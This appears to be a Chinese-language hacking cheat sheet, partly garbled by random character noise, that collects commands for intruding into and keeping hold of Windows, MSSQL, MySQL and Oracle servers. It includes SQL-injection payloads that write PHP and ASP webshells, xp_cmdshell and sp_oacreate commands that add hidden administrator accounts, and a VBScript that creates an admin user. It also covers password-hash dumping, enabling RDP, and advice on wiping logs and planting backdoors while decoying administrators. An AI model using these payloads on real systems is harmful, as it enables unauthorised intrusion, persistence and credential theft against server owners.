, g% z4 ?4 l8 Y A6 w" F1.net user administrator /passwordreq:no
$ i" s3 Q( [. A4 _4 x+ `( \这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了% Y6 }! w% C# F* H
2.比较巧妙的建克隆号的步骤
0 @4 m2 {* ^ x6 l先建一个user的用户8 k, _5 _4 x% q* o' R
然后导出注册表。然后在计算机管理里删掉$ C# H' X' L! k2 a& s' J4 d
在导入,在添加为管理员组
+ g8 E) r9 p7 n0 B* \; G3.查radmin密码7 D k: \4 ]6 I9 `6 d
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
# p4 o3 S" r, @8 ]4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]- J. _$ H6 n9 N4 E8 H+ E# J
建立一个"services.exe"的项: |& X0 Z1 X9 | z4 ?
再在其下面建立(字符串值), l- k# V6 H/ K; q9 V
键值为mu ma的全路径3 Z2 O8 B* r* o/ q3 K. P0 q* q
5.runas /user:guest cmd: [' Z# ~7 Z' s# r* M# n/ [
测试用户权限!
5 `3 Q7 k9 H% t) { f% U, r6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
) E" f& s: }* e" @7.入侵后漏洞修补、痕迹清理,后门置放:
" t5 p r- B( \: z基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
: J0 U6 T+ f# @1 X+ ]8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
' V& V6 U5 @: D, {6 z' O9 k6 H' K. Q0 N
for example
0 _& |: z( h7 \) S1 \6 o1 w8 B
6 {, }5 H x m t- l! Y" B0 zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
; x- L8 m1 r0 O( Y+ h. Z2 Y
( m% ?. ~& g" ^& t% O8 N. Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'8 t) ?! r( m% k5 a
3 p/ K3 ~! J7 I& J+ y3 Q9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
9 {6 w' F' n3 {$ k3 R如果要启用的话就必须把他加到高级用户模式
1 M1 V8 w: B* K; G* U8 V- M5 |( v) g可以直接在注入点那里直接注入. R- {6 b5 D5 p% w0 W3 S4 u$ R
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
* q3 M O" S# V8 T- ?" T* ]然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--0 y1 q1 N1 }, Y- E
或者
! [6 E8 ^' l7 |' F5 t4 \1 rsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" `. O' Q# u0 B* W! Q1 \来恢复cmdshell。, x# e2 [; d1 a, q
& ?" R7 G: E" r3 q分析器
! \- I5 X+ _1 H7 B9 `EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- Z1 Q4 E1 m( }# z! a) Z7 [( K3 E2 Y% l
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"). L+ y' I6 S5 q. i# t) r
10.xp_cmdshell新的恢复办法
9 e% R% n1 G; s9 m( Gxp_cmdshell新的恢复办法) n. H3 `4 r ~0 R/ H
扩展储存过程被删除以后可以有很简单的办法恢复:
5 t- q" i/ Q9 h" n# x2 w6 S5 o删除
) _$ |3 g j5 qdrop procedure sp_addextendedproc
) _- l$ N: k0 gdrop procedure sp_oacreate
, R! D: g+ c( ]% fexec sp_dropextendedproc 'xp_cmdshell'
9 H& o8 G: B) H' _' {2 w
2 V) ~% [3 J5 }恢复" U4 |% E8 }7 Z0 o$ V! u2 c% Q. ^" M
dbcc addextendedproc ("sp_oacreate","odsole70.dll")6 ^# x' l% [$ |5 {4 ` _: f) q v& C
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
/ k0 }$ q; P1 Y+ S) p* y9 D4 v" \( N4 G" y1 E. u" H$ ?3 B) \. D
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
' ?4 ?# }3 F% w% ^1 W, C0 f% n
$ o# }; c8 Q, D5 O0 @7 o% c-----------------------------4 c% x3 n( U& o# S% l+ D4 v( ~* e
0 e$ |& A7 l) a3 i3 G$ a
删除扩展存储过过程xp_cmdshell的语句:
8 w8 ~9 i( Y: ^4 A" ]exec sp_dropextendedproc 'xp_cmdshell'$ X6 m. h) B3 D* e* _+ \
- C/ {7 [2 O1 u7 E
恢复cmdshell的sql语句- f' ]5 U* j/ U" C' C0 y; {
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" C8 R3 ~7 G6 x9 o& Q% b" d' f
! G" {( d" O8 w- W- F' k# j: m
+ o$ _2 Z9 \8 w ?3 |开启cmdshell的sql语句& P7 W% k( k8 k2 G. k; _+ F
5 V% G- K0 @, [# m' H
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
* p! n p9 E9 H# ]" q+ D- d d, Q6 h
$ L8 n2 ]; ^) Z3 O4 T判断存储扩展是否存在$ m) [ n* K7 w, w# f! t+ w0 ~# P7 B5 b
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'; k/ V* x: Y1 ^7 _2 k. T
返回结果为1就ok
- j" M% a' y/ x6 P n' z6 a& n3 Z O9 G7 C
恢复xp_cmdshell
; q/ z. y; P; ^% G7 r; wexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
/ \% H# e; I- F- ?) g返回结果为1就ok% B( q% R7 n1 |1 C* B6 e
& V# T8 `3 M/ l% b, V2 v否则上传xplog7.0.dll
: C3 k/ e, p6 }; e& Z" t- l Dexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'* C1 J% k) z, H4 n: X2 j2 c
; Z% ?5 T' a3 v+ b& u4 r
堵上cmdshell的sql语句
- K" W6 A4 z6 L1 Ysp_dropextendedproc "xp_cmdshel- H& J- `! j: ]
-------------------------4 \' @, ]$ d3 A, w) P
清除3389的登录记录用一条系统自带的命令:% g2 |" b' G" h( S* F
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
2 o9 o2 B6 {! h+ f, w8 |
; b" z5 u* R v5 c! ~$ e然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
4 r& f) I6 o- j' N& F: E$ J- K在 mysql里查看当前用户的权限# k* ~7 G s. i- \ A
show grants for ) `$ @" l/ a1 E$ }! r- J& v9 ~
$ ]3 n# [* Q, C以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
0 O$ t+ P0 g: D( v- g [
/ \. L/ o2 J' X. }0 r9 p3 _ q, p' j8 H2 I V) b( u# K* N7 ~
Create USER 'itpro'@'%' IDENTIFIED BY '123';
5 I6 v7 A* B0 q, ~) R W- M' `
2 Y0 ? _+ l7 LGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
' k4 p2 r3 q: Z6 }7 o1 d' S1 Q" n7 D- h3 u
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0) F+ F- b- [' e t1 M: U
h& ]' j5 Y: b; c0 k# [MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;- D, O7 @ B7 P+ b$ }. `2 N
8 Q1 z5 u- L9 G6 {, i Z: V搞完事记得删除脚印哟。& E) |' Y0 L4 h/ X
% i0 J0 b& b8 u0 n- I3 e+ X1 lDrop USER 'itpro'@'%';
# v, M2 W" O- Z7 s% l" R% f2 f% N8 J
Drop DATABASE IF EXISTS `itpro` ;
/ R( D1 o6 {& D6 o+ M- L0 d6 I4 T3 C2 ^ s
当前用户获取system权限
) _: ?4 F, k2 i7 M- k8 Ksc Create SuperCMD binPath= "cmd /K start" type= own type= interact
! m7 x( W+ b! U# K3 R- G/ Csc start SuperCMD
2 `( w: t: T3 x( F程序代码
% D" H- Y) @# ?& A<SCRIPT LANGUAGE="VBScript">6 Y. g3 A q7 z4 f
set wsnetwork=CreateObject("WSCRIPT.NETWORK")4 a! {/ z" u( T
os="WinNT://"&wsnetwork.ComputerName
- |- I4 k0 S+ P K5 h! SSet ob=GetObject(os)( U _8 K& e* `" ^
Set oe=GetObject(os&"/Administrators,group")
: P& n4 m( h; U$ uSet od=ob.Create("user","nosec")3 ]" n7 u* w0 A; Y" r4 r5 ~
od.SetPassword "123456abc!@#"
, `3 b% R: u) }- R% y) U; l) Vod.SetInfo" g8 f; t! b( R: b+ V$ y, O
Set of=GetObject(os&"/nosec",user)+ R. ]4 K! L1 u
oe.add os&"/nosec"4 x# F# s( g G$ W
</Script>: E' J) _) o+ b* M, @
<script language=javascript>window.close();</script>
$ q( b) O/ r: z' _ ^* g, \9 N# p- h0 ?( j
+ L5 _' b* x0 @) n: k) i4 Y
6 _: P3 o0 |1 `+ S
3 s/ {% Y; h6 g5 |突破验证码限制入后台拿shell
% W4 s! q6 k" }' H! k程序代码
9 [1 d! q! \1 ^1 U9 P8 AREGEDIT4
1 ?4 ^8 g! O; k1 k) l; N6 c[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
. @6 Z# {0 g, `* j; l, {' ^" [0 D5 i6 \"BlockXBM"=dword:000000006 j3 ~. s5 F# W/ l1 _' K
# k$ Z% h5 `8 o# h8 Q4 Z/ y
保存为code.reg,导入注册表,重器IE
0 k! V. U) v6 |1 v6 e就可以了* o# b! a" W# z8 a" T1 m9 _* I) Y
union写马
4 B( E9 X7 Y" Z/ U" R: \& X o程序代码3 q6 l1 `5 I$ u/ F$ z' }2 o3 C! F1 ^
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
9 a+ X/ x, a! E: ?4 \$ g
* j9 k4 x" Q e5 x& ]应用在dedecms注射漏洞上,无后台写马
6 p* F% Z2 j; L3 p, Xdedecms后台,无文件管理器,没有outfile权限的时候. g- z# B8 S$ ~6 l
在插件管理-病毒扫描里( `' k, J& A6 W# ~& [% }2 U% N
写一句话进include/config_hand.php里2 r2 u4 T8 c$ j1 _7 b: u. d6 Y
程序代码' w0 P7 f3 T- {: e1 ?) c
>';?><?php @eval($_POST[cmd]);?>/ y9 G; @* B/ g% |$ ]# l1 m
0 e% F0 X* A3 B. o2 S7 o" l9 g
- e' [% N" ~* D# V4 ]如上格式
! P2 [# ]) U$ b1 L4 ~ I% \, f0 J5 F6 P$ d* R
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
$ f8 L0 E n/ {2 f! L程序代码
; ~! x. i: U- y6 _3 y4 Zselect username,password from dba_users;
I! Y/ s$ c$ F# u2 Z, k+ b* Y- ~, |- `5 H
8 ]* k# ~1 w4 S/ ]8 K9 [mysql远程连接用户
$ G+ ^& U2 n4 W4 r程序代码1 I; a/ j' I6 a* a* |" c
: R9 h0 Q2 z# g% c; [9 A9 Y& DCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
- n/ K; {2 s; R7 ?) dGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION4 J [) U9 N2 ~
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0) s9 n5 M3 T" Y+ I
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;' u: F1 m" V' W/ _' s" g
+ x, p! `+ B* s, J# o
2 A8 a+ [: t$ x6 p7 [
0 @) N' l; o$ G7 U" h
+ Y% b" ]* D; ~, P$ s
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
+ M# K# W4 e) x8 x- v# }/ U8 ^ T( H' ]7 }5 S
1.查询终端端口: u! q) _' R8 Y, ]
& _# }6 Q$ H. X/ J& i
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
! Z3 w6 F5 \% Z" I, a$ G3 w3 `/ x- A; M% S- i
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"+ D( L, _. _' |0 {4 J! {4 d
type tsp.reg
7 |6 j, O- A% @# L
; t9 j( y8 a6 T9 D. K" T! z2.开启XP&2003终端服务8 ?6 E3 s) K* H4 |
& v' b% l2 ~0 Y# D! F- C& P/ W4 | {
( m, q7 f2 b0 r# Y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
: r }' P- N$ G
4 N& @3 J( p* _9 D! q; U
) z' f" m" w. U3 |: uREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f; w% o- p8 I6 n4 r1 i
: ^; M' t$ }4 x. |3.更改终端端口为20008(0x4E28)5 \% I- y+ D% X; m9 g2 P
0 e9 R$ ^; ]4 l7 h% F1 O
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f: w/ R6 q+ R8 n/ t p/ {- b- ^
3 f7 M1 V2 c& ~. a2 g) @) e. k
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f4 U1 y1 R3 V% b3 ^$ A/ M
; n" g: [5 C0 S: Y n0 l
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
& r" k6 Y& V( C- s/ A7 T3 x# I+ G9 d0 s: Q. {& p1 |
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
" u. o6 u, P& h' ]& Z/ S3 b. \4 B$ n k k( ?
, {! o- {- W" g6 c6 X5.开启Win2000的终端,端口为3389(需重启)
! K# X+ I6 b: v t5 L% @3 j# ], f, M9 G6 q1 @, Q
echo Windows Registry Editor Version 5.00 >2000.reg
) q9 ]5 N5 F6 H: c" Lecho. >>2000.reg
' ?6 M- M. S- R( techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
/ J7 j: L4 q% J ]echo "Enabled"="0" >>2000.reg 4 W0 c% q, f+ N: E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg / }3 R2 @% ]2 X% H. h9 w' i" q% R
echo "ShutdownWithoutLogon"="0" >>2000.reg 3 i& l) [. H* f+ s/ \# o; F* s, d' i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
& c, k+ W, x/ O/ Mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
! J& b. T" z/ Y( Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
. |# z c! M# t: H. H3 Gecho "TSEnabled"=dword:00000001 >>2000.reg
# D% i2 j* O1 I4 i+ q1 K Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
: |& w, Z: C, p8 V1 S$ Gecho "Start"=dword:00000002 >>2000.reg % @1 N3 I8 X6 @) l5 D/ Q9 V4 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
$ j2 Z* D1 T$ z1 I- Q: g3 V3 D$ w2 \echo "Start"=dword:00000002 >>2000.reg
! q! _; k+ D: ~2 h6 @2 s8 X/ w* H+ Necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
. F: R8 c/ F/ ?% d2 A2 `echo "Hotkey"="1" >>2000.reg
# G1 ?/ m9 p7 \" K+ necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
8 g6 b$ J3 L# m) J5 techo "ortNumber"=dword:00000D3D >>2000.reg
* W a1 U/ E m1 c$ B3 M$ z8 `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 9 o' p* E O% Y, Z% T5 a. j
echo "ortNumber"=dword:00000D3D >>2000.reg. i, V U6 [! K: J; u; ~6 C
, k: M/ P" ~9 d; \. D' t2 R r6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启) {# q( p+ [, H# t) Y) j* a% n
0 {& H5 h+ v; v
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf" c1 y7 V- a# b% G2 N. @" I
(set inf=InstallHinfSection DefaultInstall)8 m; [: ?. p$ x1 J) X3 g
echo signature=$chicago$ >> restart.inf* f% o7 i4 w% {* S
echo [defaultinstall] >> restart.inf/ A9 m# @6 I1 q6 A. \
rundll32 setupapi,%inf% 1 %temp%\restart.inf' p0 y- Z! i! _% O9 W; F7 e( W+ M
& l4 g3 a2 h; J- }0 G
) v% X4 r# H2 ?4 ?7.禁用TCP/IP端口筛选 (需重启)( v5 Y- c9 W0 t6 f, ?- N6 F
7 ^6 c$ ]. B) V5 y, w+ m
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
/ w, l/ |. K' |0 T S/ I
& R) a; _* k' Q8 y$ L8.终端超出最大连接数时可用下面的命令来连接+ ~) G3 p: S9 Z8 l- r. ~
+ A) q: T# J% Q" o: O' m" ^
mstsc /v:ip:3389 /console( y, ^" W$ S5 V
$ z( G9 M9 g# i# k8 |
9.调整NTFS分区权限
5 l; P* I4 @0 e- Z% F7 t: n2 O" w* O" _, ~- } p- e- r' b5 e
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)1 P+ [- g5 ^& g2 a, n0 P' Q; h
: N: M. j5 { b5 P, }( U/ S% o6 o
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
# |7 ^. {% M# G1 ?0 w, y% |
: d1 P+ T! p H2 I------------------------------------------------------
( q6 s+ J, O! {4 H' @3389.vbs , W5 N* D* }2 K! @3 A
On Error Resume Next
7 Y0 ?3 f" I" T" M2 c ~const HKEY_LOCAL_MACHINE = &H80000002
0 q+ _ o7 j( W$ H4 g& A8 k+ J2 BstrComputer = "."( `! u: g- b' ]0 s1 H
Set StdOut = WScript.StdOut
; X* C/ G( _ @Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
+ W# p9 G1 u2 R$ ~strComputer & "\root\default:StdRegProv")
) n; V0 J5 I7 l$ ?/ h# tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
8 t1 A# T8 L M' Noreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
: x& T# P' F8 t7 w: RstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
; G2 @# U, G0 v) ooreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath; _) z3 ]+ _2 p# ~8 B N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
0 ~ H& ?' {# r. h- x! B+ @9 x0 gstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"! x7 l) `* q) i7 s
strValueName = "fDenyTSConnections"% l L& I0 D$ H c
dwValue = 0
- E) m* e; w, aoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: Q2 b# H- T5 f/ U+ N$ o/ F
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
0 B, H( c( g; `$ v: SstrValueName = "ortNumber"
$ y' T. ]5 N6 q1 GdwValue = 3389* R$ ^* |8 d7 @& m1 ]( }
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* h* C- }( Z j( p6 g9 y1 f# y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
" @* ]# l y* N, z/ x8 ^, HstrValueName = "ortNumber", B. A/ T( Q/ h ?3 e3 m
dwValue = 3389' w! T* Y, ~. |' b2 K) [
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, r0 I, M- Q: f, i' a1 f `! VSet R = CreateObject("WScript.Shell")
2 k4 Y# J; y) v4 ER.run("Shutdown.exe -f -r -t 0") 6 {3 R2 b! F! C' J
+ u/ O' s4 Q" h( |
删除awgina.dll的注册表键值
( u: q7 @. s1 M程序代码
1 N8 Z3 g$ j8 Q, Q, \. G) q, @
9 R2 |% e" }7 W! A$ Q6 ]1 yreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f0 z- V3 b+ k T0 R/ k
% N; f3 S5 z P% N6 e+ I: ]3 {9 B, ~/ X4 z5 v7 O6 V1 ^% J" c) A! {
9 |8 V! v6 p8 D# } ~2 q1 g& L, ]' f9 d, G* n
程序代码
+ b5 {1 \" j7 v; N7 YHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
# ]# J2 T4 |7 |2 Y5 Q( l
' Z6 w. b( Z6 ^7 y8 G7 N设置为1,关闭LM Hash
* b Q/ }& J0 H! L# R3 ]
$ H5 B+ F+ z' E2 C, u8 M( F1 o3 z数据库安全:入侵Oracle数据库常用操作命令
0 A: Z7 W! v2 H4 T6 e2 E$ ], v最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。5 W! U1 v7 J$ U O) Y
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
$ Z# |2 h( I! ?% E4 |2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 P. Y/ W4 L2 G; ?# @! a3、SQL>connect / as sysdba ;(as sysoper)或
* q. R: Q- S7 F0 `connect internal/oracle AS SYSDBA ;(scott/tiger)
( }7 D/ I9 E9 f9 dconn sys/change_on_install as sysdba;4 O+ A$ j( |% ~: n7 `. _0 l$ k
4、SQL>startup; 启动数据库实例3 Z: N: Z/ V- H
5、查看当前的所有数据库: select * from v$database;% p3 @+ H5 J8 u* o
select name from v$database;
- C9 E+ C K# U6 ~, ?6、desc v$databases; 查看数据库结构字段, ]6 }' \% L4 s" ^5 L; g
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:2 h4 r! o% F9 O8 T$ V1 A. U# L; Q# M
SQL>select * from V_$PWFILE_USERS;
$ Y! X- w2 t- x7 Z+ ?Show user;查看当前数据库连接用户
* v( ^+ P' U/ F# p+ T' Z8、进入test数据库:database test;- Z5 \# L" O9 |* |4 i4 }8 J5 s
9、查看所有的数据库实例:select * from v$instance;
: k" H& V1 B2 b2 O' X- |如:ora9i k. Y5 b6 o: v. x6 y, |1 G9 E
10、查看当前库的所有数据表:* z* k! h, g% T R
SQL> select TABLE_NAME from all_tables;
2 y% k, C7 Y% qselect * from all_tables;
! s% e7 Q& y" E, h Z' ?% k) uSQL> select table_name from all_tables where table_name like '%u%';
- {4 s' ]% Z3 L P3 r* b# GTABLE_NAME' }+ ?& b4 l/ V7 D$ m7 M
------------------------------
7 N) @1 ~) t: K6 v_default_auditing_options_
7 D8 r% e' b7 t3 o11、查看表结构:desc all_tables;, ]' v6 p) K. v1 C4 w) u
12、显示CQI.T_BBS_XUSER的所有字段结构:
1 A" G) X* Z0 g& E# E zdesc CQI.T_BBS_XUSER;
0 q n2 ^& `# x3 V2 }$ n( ^13、获得CQI.T_BBS_XUSER表中的记录:4 J! N5 D: q1 D2 Z' W9 s7 L, R) V% {
select * from CQI.T_BBS_XUSER;
7 y4 E3 J( o- t5 E8 r/ L14、增加数据库用户:(test11/test)! Z: o$ P9 Y2 t0 |3 W
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
/ @" y' h8 C y3 f n15、用户授权:) ?/ z3 S& U8 R4 `, E
grant connect,resource,dba to test11;8 g4 G1 n6 v; u; e+ s
grant sysdba to test11;
: U: O. U' a) R9 W9 @* l2 g3 wcommit;
1 g; ?4 s) f6 g: i2 ]" ^/ z* H) b16、更改数据库用户的密码:(将sys与system的密码改为test.)
# j' v, R0 `- f, yalter user sys indentified by test;6 h* j" N+ s8 E3 b4 R: k: g
alter user system indentified by test;9 {7 s7 ]) |- X9 p/ x
7 t E+ _- b* n5 |3 uapplicationContext-util.xml/ ^$ Z( Q5 h2 x h1 z' N
applicationContext.xml
6 ~; x% Q5 f( Hstruts-config.xml' A* r0 X6 _+ x$ J1 n0 ]. k
web.xml
3 H/ y- t' V( r% H7 z" }6 u2 Dserver.xml' d, o( q v) _& _- j* z
tomcat-users.xml4 |4 E) A: l4 }; f! l& k
hibernate.cfg.xml
3 I* S. Y% c' F% W! wdatabase_pool_config.xml
$ ~1 m$ H6 U/ [3 F" B3 \- [
) u) J5 c$ R% C7 ^. o
0 `& C) u' W3 t. O/ [; N$ `( m\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置) n9 i2 Z7 D) C; `
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini/ Z! x8 P2 j+ u" A1 j, _$ j. y
\WEB-INF\struts-config.xml 文件目录结构( c; a! Q. \* a `! J
) q; |2 U2 u S! t
spring.properties 里边包含hibernate.cfg.xml的名称; r3 e9 B* o. d/ c
/ x0 i7 }; ?6 v* T4 x: w- h, w
& w+ v. _$ S0 s
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml! t3 o- @! x8 ?! X$ J& _
& q G* k% V. A, ]如果都找不到 那就看看class文件吧。。
/ R, f( `! P, A5 b2 z1 C6 |9 Q8 q( y N$ Z: X
测试1:
( K- s& J6 I4 N5 jSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) N6 o( n- G, t4 `7 a9 T' m
# y8 W9 I: x3 s1 Q测试2:. d- M$ `8 E, A: r2 V' x
" Y! W3 \5 _" N& D _+ [2 o
create table dirs(paths varchar(100),paths1 varchar(100), id int)- r# ]; g( I: `
3 q/ V; Y' W+ V% N# i3 B
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
s% v/ P* R' c4 [3 _' ~3 N0 Q8 w6 w- r' q& O
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' |! D: D' k3 N( h! x, Z2 W3 s6 Q! V8 Y$ L) w; b5 y( J
查看虚拟机中的共享文件:. X: {2 I# L) R$ g
在虚拟机中的cmd中执行4 r$ j% Z( B2 V; s* o) n. F6 o0 L S
\\.host\Shared Folders
3 A5 k0 Y1 [0 `0 D$ J, \
! ?- I* u# J" }- p- K1 h8 icmdshell下找终端的技巧
$ F }3 n2 N& F ~$ t( T5 [找终端: . x1 ]3 K4 K7 R' I/ g
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 8 G. ^( s: j& I# U% ?
而终端所对应的服务名为:TermService
+ Z' e5 _7 h8 {! C4 F, I0 x, a+ C第二步:用netstat -ano命令,列出所有端口对应的PID值! % X6 S- k6 I9 |6 ^
找到PID值所对应的端口; i5 [( }( ]( a+ J8 o1 E
6 X' _& g+ G* S% v1 |% l9 x- C
查询sql server 2005中的密码hash4 H/ t6 V2 q7 I$ t& G* Z
SELECT password_hash FROM sys.sql_logins where name='sa'
* ], J: R3 Y5 R. v) w% CSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a/ s# v& M1 Y) [
access中导出shell B, f4 l! T6 K2 Y9 \) m4 r
